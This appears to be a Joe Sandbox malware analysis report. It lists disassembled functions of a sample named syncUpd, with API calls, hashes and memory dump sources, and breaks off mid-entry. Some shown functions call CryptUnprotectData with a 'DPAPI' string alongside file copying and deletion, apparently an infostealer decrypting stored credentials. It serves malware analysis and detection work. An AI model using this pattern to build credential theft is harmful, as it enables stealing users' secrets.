                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                                              • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                                              • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                              • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                              • Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                                              • Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F9D97 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008F9E18
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FA1D1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 008F9F14
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FA252
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3258613111-0
                                                                                                                                                                                                                                                              • Opcode ID: 799f4e43c5f134c97f91417602cae88205eca33e556a901edf62be0764f24219
                                                                                                                                                                                                                                                              • Instruction ID: 752896514542b3c3ddd4948ed283218da0c23b33a5ec3e9ca78872aca56bed7a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799f4e43c5f134c97f91417602cae88205eca33e556a901edf62be0764f24219
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97D1AA72C081189ECB15EBE4DCA2EEEB339AF94714F508159F156621D2EE707A48CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDE8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDFC
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CE75
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: 1a2281000a43369f0a13837b1e72b39a7635c931107537b917ed16c9f17fd920
                                                                                                                                                                                                                                                              • Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a2281000a43369f0a13837b1e72b39a7635c931107537b917ed16c9f17fd920
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FCDB7 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FCE38
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD04F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD063
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FD0DC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: be897372b75303ba80917d01fc52a5d1a0540ec3c5e777bfdcc3a35dd85c6f1a
                                                                                                                                                                                                                                                              • Instruction ID: ba76fd98c0955b7726b4d3979615f40b6c90072e6f06542bd3c284982a5f3f9b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be897372b75303ba80917d01fc52a5d1a0540ec3c5e777bfdcc3a35dd85c6f1a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA910A72D042089ECB14FBE4DCA2EEEB339AF94714F504269F516A21D1EF707A49CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: 8e8863251cc6f26f4367d46da0deda438ae25ff5ad045d48b982a9fd54c4a87c
                                                                                                                                                                                                                                                              • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8863251cc6f26f4367d46da0deda438ae25ff5ad045d48b982a9fd54c4a87c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FD127 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FD1A8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD346
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD35A
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FD3D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: c558b7e00d0d76aa72a1bcc311bbf49d9e1781368b121fae5ccf1dcd978b6673
                                                                                                                                                                                                                                                              • Instruction ID: 76f7b27f66bce32d578d7153facc8435d51abb97ec388efd81cbecfb27b1ce08
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c558b7e00d0d76aa72a1bcc311bbf49d9e1781368b121fae5ccf1dcd978b6673
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A81D872D042089ECB14FBE4DCA2EEEB339AF94714F504529F516A61D1EE747A08CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F9A57 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 1400469952-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: cf0923edcf58d9fd68d49d25af9debf8b9c2c01576fe0c70bfcba815ecf84208
                                                                                                                                                                                                                                                              • Instruction ID: b84aa922060131e3fe13fe1bd4b89ae76e89a6898b35400ca1134efdcdde526e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf0923edcf58d9fd68d49d25af9debf8b9c2c01576fe0c70bfcba815ecf84208
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541E6B1A0021CAFDB04DFA8D895FEDB7B5FF84304F108118F609AB294DB74AA55CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                                                                                                                                              • Opcode ID: 2e419d620f0a5b825e319d5da671caaf45571abc24dc68d77d646ed724d5e6f1
                                                                                                                                                                                                                                                              • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e419d620f0a5b825e319d5da671caaf45571abc24dc68d77d646ed724d5e6f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00964490), ref: 0040971B
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                                                              • API String ID: 1204593910-1819349886
                                                                                                                                                                                                                                                              • Opcode ID: f1c1b07571841af84a2b01cf28d74e2b7f9a03ce27126835c702bcf18e36c141
                                                                                                                                                                                                                                                              • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
